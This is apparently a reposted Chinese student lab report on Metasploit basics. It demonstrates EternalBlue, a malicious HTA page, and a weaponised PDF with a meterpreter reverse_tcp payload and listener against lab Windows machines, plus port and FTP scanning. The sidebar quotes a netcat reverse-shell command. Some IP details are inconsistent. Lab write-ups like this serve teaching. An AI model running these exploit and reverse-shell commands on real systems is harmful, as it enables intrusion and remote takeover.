2018-2019 20165235 网络对抗 Exp5 MSF基础

最新推荐文章于 2024-09-14 23:11:55 发布
最新推荐文章于 2024-09-14 23:11:55 发布
阅读量118 收藏
点赞数
文章标签: 操作系统 网络 数据库
原文链接:http://www.cnblogs.com/qy20165235/p/10708268.html
版权

2018-2019 20165235 网络对抗 Exp5 MSF基础

1. 实践内容(3.5分)

1.1一个主动攻击实践

攻击方:kali 192.168.21.130
靶机: win7 192.168.21.128
永恒之蓝漏洞是利用框架中一个针对SMB服务进行攻击的漏洞,该漏洞导致攻击者在目标系统上可以执行任意代码。
进入msfconsole输入 use exploit/windows/smb/ms17_010_eternalblue。并且通过show payloads 显示可用攻击载荷。
1296711-20190415105554004-1974348575.png
设置tcp反向连接:
1296711-20190415105629952-472213275.png
设置参数:
1296711-20190415105652082-57010231.png
输入:exploit
1296711-20190415105736995-1442115289.png
渗透成功:
1296711-20190415105742831-1342381215.png

1.2 一个针对浏览器的攻击

攻击方:kali 192.168.21.130
靶机: win7 192.168.21.128
我们先启动msfconsole并使用模块use exploit/windows/fileformat/office_word_hta
1296711-20190415105946972-1857584276.png
查看目标show targets
1296711-20190415110017754-321036389.png
show options,可以看到已经默认帮我们配置好了,我们只需要run执行即可,相应的产生了一个URL。
1296711-20190415110122754-963275237.png
在靶机的IE浏览器中输入KALI中生成的URL,出现一个窗口,点击运行即可:
1296711-20190415110253116-1590832337.png
看到kali那里已经产生了session会话,我们按下回车回到命令行,使用sessions -i 1来与第一个session建立连接,再输入shell拿到权限:
1296711-20190415110353797-96975698.png
输入指令测试,渗透陈成功:
1296711-20190415110425873-718844713.png

1.3 一个针对客户端的攻击(Adobe)

本次实验在win7中实验并没有成功,于是我将靶机换成XP系统。
查看靶机ip:
1296711-20190415110740253-321264395.png
kali输入msfconsole进入控制台,依次输入以下命令
攻击方:kali 192.168.21.130
靶机: win7 192.168.21.131
use windows/fileformat/adobe_cooltype_sing :选择攻击模块
set payload windows/meterpreter/reverse_tcp :设置tcp反向连接
set LHOST 192.168.21.130 :kali IP
set LPORT 5235 :设置攻击端口
set FILENAME 20165235.pdf :设置生成的pdf文件名
exploit:发起攻击
1296711-20190415110857570-664075742.png
我是第二次做的时候截的屏,所以没有显示文件路径。将20165235.pdf复制到XP中。重启控制台,并且输入以下命令进入监听模块:
use exploit/multi/handler:进入监听模块
set payload windows/meterpreter/reverse_tcp :设置tcp反向连接
set LHOST 10.0.0.138 :kali IP
set LPORT 5330:设置攻击端口
exploit :监听
1296711-20190415111141061-1356968598.png
接着在XP中打开20165235.pdf文件:
1296711-20190415111231476-941371780.png
渗透成功:
1296711-20190415111343421-80452203.png
关闭20165235.pdf,连接断开:
1296711-20190415111351312-593171660.png

1.4 成功应用任何一个辅助模块。

auxiliary/scanner/ftp/ftp_version

攻击方:kali 192.168.21.130
靶机: win7 192.169.21.128
本次的模块是通过MSF渗透帮助手册中找到的。功能是可以查询到某一网段中的ftp服务器以及其操作系统的类型。
首先在win7中搭建一个ftp服务器,具体的过程可以上网查找。一下是搭建好的ftp服务器:
1296711-20190415112025702-755219996.png
测试ftp服务器是否可用:
1296711-20190415112054036-221535367.png
进入msfconsole,输入use auxiliary/scanner/ftp/ftp_version,设置要扫描的网段范围:set RHOSTS 192.168.21.1-254,设置线程数:set THREADS 55,(线程数是每次扫描的主机个数。),直接输入run即可看到结果:192.168.21.128:被扫描出来,并分析出是微软的Windows操作系统。
1296711-20190415112602819-1472214380.png

auxiliary/scanner/portscan/tcp

攻击方:kali 192.168.21.130
靶机: win7 192.168.21.128
创建msf所需的数据库:
service postgresql start
msfdb start
进入msfconsole,使用auxiliary/scanner/portscan/tcp模块,用来扫描靶机的TCP端口使用情况。执行命令use auxiliary/scanner/portscan/tcp进入并使用模块:输入show options查看需要设置的参数信息:
1296711-20190415115235464-358242628.png
设置参数:set RHOSTS 192.168.21.128set PROTS 1 - 5235(扫描1到5235端口),之后使用run,进行扫描。
1296711-20190415115349135-169120489.png

2 报告内容:

2.1.基础问题回答

(1)用自己的话解释什么是exploit,payload,encode.
  • exploit:exploit字面上的意思是“开拓、开发”,exploit就是利用一切可以利用的工具、采用一切可以采用的方法、找到一切可以找到的漏洞,并且通过对漏洞资料的分析研究,从而达到获取网站用户资料文档、添加自定义用户、甚至侵入网站获得管理员权限控制整个网站的最终目的。但是在MSF中,exploit将负责攻击的代码payload传送到靶机中。
  • payload:payload是指:有效载荷。它是靶机被渗透攻击之后执行的恶意代码。

  • encode:是编码的意思。将payload进行多次编码后,使改变其形态。

    2.2.实践总结与体会

    通过本次的实践,学会了利用MSF进行多种方式的渗透,不敢说能灵活应用并且实战,但是学到了不少东西。在进行实验时,网上的资料太少,而且对好多模块并不知道它的意思以及用法,于是我就翻出它的英文帮助手册,利用翻译软件看懂了使用方法。在以后的学习过程中一定要活学活用。

    2.3.离实战还缺些什么技术或步骤

    首先是攻击手法单一,应用不灵活,在实战中要求使用多种方法,学会去扫描靶机的漏洞以及可用的端口等。要真正的应用于实战就要我们能灵活的使用MSF提供的大部分的攻击手段,同时也得学会使用其他的攻击平台。

转载于:https://www.cnblogs.com/qy20165235/p/10708268.html

weixin_30682415
关注
网络对抗技术 20181314 Exp6 MSF基础应用
weixin_46014245的博客
04-26 384
一、原理与实践说明 1.实践原理 2.实践内容概述 3.基础问题回答 二、攻击过程记录 任务一:主动攻击的实践 ms08_067_netapi:自动化漏洞溢出攻击 任务二:攻击浏览器的实践 ms07-017 ms11-050 任务三:攻击客户端的实践 Adobe ms10_046 任务四:成功应用任何一个辅助模块 在ms08_067中应用use auxiliary/scanner/portscan/tcp搜索靶机开放端口 加分项:测试2019年以后的漏洞 三、实验遇到的问题及解决方法 四、离实战还缺些什么技
20204323太晓梅 网络对抗exp6 MSF应用基础
m0_57567318的博客
05-04 152
Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。
2018-2019 20165208 网络对抗 Exp5 MSF基础
weixin_34404393的博客
04-12 238
目录 2018-2019 20165208 网络对抗 Exp5 MSF基础 实验内容 基础问题回答 实践过程记录 1.一个主动攻击实践,如ms08_067; 2. 一个针对浏览器的攻击,如ms11_050; 3. 一个针对客户端的攻击,如Adobe;...
2018-2019 20165221 网络对抗 Exp5 MSF基础
weixin_30435261的博客
04-20 159
2018-2019 20165221 网络对抗 Exp5 MSF基础 实践内容: 重点掌握metassploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成: 一个主动攻击实践,如ms08_067; (1分 一个针对浏览器的攻击,如ms11_050;(1分) 一个针对客户端的攻击,如Adobe;(1分) 成功应用任何一个辅助模块。(0.5分) 具体实验操作 攻击机(kal...
红队系列-网络安全知识锦囊(持续更新)
aming小老弟
11-09 981
AJP13是定向包协议。因为性能原因,使用二进制格式来传输可读性文本。AJP协议:WEB服务器通过TCP连接和SERVLET容器连接。为了减少进程生成socket的花费,WEB服务器和SERVLET容器之间尝试保持持久性的TCP连接,对多个请求/回复循环重用一个连接。一旦连接分配给一个特定的请求,在请求处理循环结束之前不会在分配。换句话说,在连接上,请求不是多元的。这个是连接两端的编码变得容易,虽然这导致在一时刻会有很多连接。
2019-2020-2 20175212童皓桢《网络对抗技术》 Exp4 恶意代码分析
weixin_44826338的博客
04-17 559
2019-2020-2 20175212童皓桢《网络对抗技术》 Exp1 恶意代码分析 目录 1. 实验目标 2. 实验内容 2.1 系统运行监控 2.1.1 Windows计划任务schtasks 2.1.2 sysmon工具 2.2 恶意软件分析 2.2.1 系统运行监控 2.2.1 系统运行监控 3、答老师问 3.1 实验收获与感想 3.2 如果在工作中怀...
网络对抗技术-Exp2-后门原理与实践 20181314
weixin_46014245的博客
03-15 405
一、实验内容 1.使用netcat获取主机操作Shell,cron启动 Windows获得Linux Shell 在Windows下使用ipconfig查看本机IP win+r 输入cmd,打开监听 nc -l -p 1314 在kali中反弹连接Windows,nc 172.16.214.132 -e /bin/sh,使用-e选项执行shell程序 Windows成功获得kali的shell,利用ls,whoami指令查看相关信息 Linux获得Windows Shell 在kali中使用ifconfi
网络对抗技术-Exp3-免杀原理 20181314
weixin_46014245的博客
03-31 707
一、免杀原理及基础问题回答 1.免杀原理 一般是对恶意软件做处理,让它不被杀毒软件所检测。也是渗透测试中需要使用到的技术。 要做好免杀,就时清楚杀毒软件(恶意软件检测工具)是如何工作的。AV(Anti-virus)是很大一个产业。其中主要的技术人员基本有编制恶意软件的经验。 反过来也一样,了解了免杀的工具和技术,你也就具有了反制它的基础。 2.基础问题回答 杀软是如何检测出恶意代码的? 基于特征码的检测:简单来说一段特征码就是一段或多段数据,经过对许多恶意代码的分析,我们发现了该类恶意代码经常出
4.网络编程
weixin_45476535的博客
09-14 184
程序注册端口:1024-49151。单个协议下,端口号不能冲突。公有端口0-1023。
软件安装攻略:EmEditor编辑器下载安装与使用
qq_39241682的博客
09-14 530
EmEditor是一款在Windows平台上运行的文字编辑程序。EmEditor以运作轻巧、敏捷而又功能强大、丰富著称,得到许多用户的好评。Windows内建的记事本程式由于功能太过单薄,所以有不少用户直接以EmEditor取代,emeditor是一个跨平台的文本编辑器,主要功能和特点如下:1.语法高亮支持对20多种编程语言进行语法加亮,包括 C++,Java,HTML,Perl,Python 等。您还可以自定义高亮规则。2.配置。
Linux入门——“Linux基本指令”上
最新发布
2301_79972085的博客
09-14 446
在刚开始学习Linux时,首先需要掌握一些基本指令,以便我们能更好地使用Linux操作系统,以下指令在Ubuntu 22上执行。以下内容不过多介绍选项内容。
Linux和C语言(Day10)
weixin_65095004的博客
09-10 1149
实现特定功能的代码块定义函数: 存储类型 数据类型 函数名(参数列表){ 实现特定功能的代码块 }
OpenHarmony(鸿蒙南向开发)——轻量系统芯片移植案例(一)
鸿蒙开发知识记录
09-14 1507
huks部件适配时,huks_key_store_path配置选项用于指定存放秘钥路径,ohos_security_huks_mbedtls_porting_path配置选项用于指定进行mbedtls适配的目录,用于芯片对mbedtls进行硬件随机数等适配。graphic配置文件见 //vendor/bestechnic/display_demo/graphic_config/product_graphic_lite_config.h。在本次适配过程中,将其调整为0x1000。
DOS脚本分析
YJlio的博客
09-11 299
S-1-5-19是本地服务帐户的安全标识符(SID),通常用于判断是否有足够的权限。:该行命令生成一个VBScript文件,通过Shell对象以管理员权限重新运行当前批处理文件(%~f0表示当前脚本的完整路径,runas表示以管理员权限运行)。else:如果ping失败(即网络连接中断状态),则显示提示信息并进入pause,等待用户按键,然后重新检查网络连接。ping *** >nul:通过ping命令检测指定服务器(***)是否有效。||: 表示如果前面的命令失败,则执行后面的部分。
大模型推理--PagedAttention
姚光超的专栏
09-11 930
在上一篇博客《》中详细介绍了大模型推理的decoding阶段可以采用KV Cache来优化重复计算的原理。虽然KV Cache大幅提升了大模型token生成的速度,但是也引入了新的问题,主要有两个:1. KV Cache在长上下文的情况下占用量非常大,导致batch很小,进而影响吞吐量,甚至根本无法支持长上下文;2. 大模型推理的时候无法预知会产生多少token,所以无法给KV Cache预分配空间,现在的通用做法是按照生成token的上限来分配空间,这产生了非常大的空间浪费。
转行软件测试工程师经验总结
2402_84109700的博客
09-12 514
数据安全官,CCRC-DSA数据安全评估师,CCRC-DCO数据合规官,CDO首席数据官, ITSS IT服务项目经理,IT服务项目工程师,ISO27001,CISP,软考,CISAW应急服务方向,CISAW渗透测试方向,软考,CCSC网络安全能力,工信部教考中心计算机网络安全相关认证办理。在测试理论方面,要熟悉常用的测试用例设计方法,理解不同测试类型的特点,掌握测试用例的基本格式,以及测试结束的标准。最终,我如愿以偿地加入了一家互联网公司,这里的办公环境优越,薪资也较之前的工作有所提升,使我心情愉悦。
linux环境下手动安装mysql
weixin_45583482的博客
09-14 639
没想到兜兜转转这么些年,今天申请个云服务器用来搭建求生2服务器,先用mysql来测试,结果还是花了相当久的时间。基本所有单节点部署应用到linux环境,都三个流程:1 下载安装包2 解压修改配置文件3 运行启动脚本我们按这个流程来说我遇到并解决的问题 ,如果你在过程中遇到什么问题,也请先暂停你的启动流程,移步到最下面的内容,看看是否有和你遇到一样的问题,解决以后继续。
浅谈构建嵌入式linux入门
rushberry的博客
09-12 1054
对于想从单片机转型到嵌入式Linux的工程师而言,目前市面上的开发板、教学视频种类繁多,让人眼花缭乱,基本上一上来就是在Linux下一顿操作,最后通过nfs等手段下载在开发板上,实现了想要的功能,说实话干单片机的工程师,有几个看得懂这些操作背后干了什么,涉及的过程是什么,用了哪些软件等等,本人始终想要把其中的过程讲清楚说明白,一定要从全局到局部的讲解,通过反复学习某位大佬的开发板和写的书,有些以前一直不理解找不到答案的概念,使用人工智能(不懂的概念就去问他)等手段,慢慢对其中的过程有了一定的了解,只能说人工
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值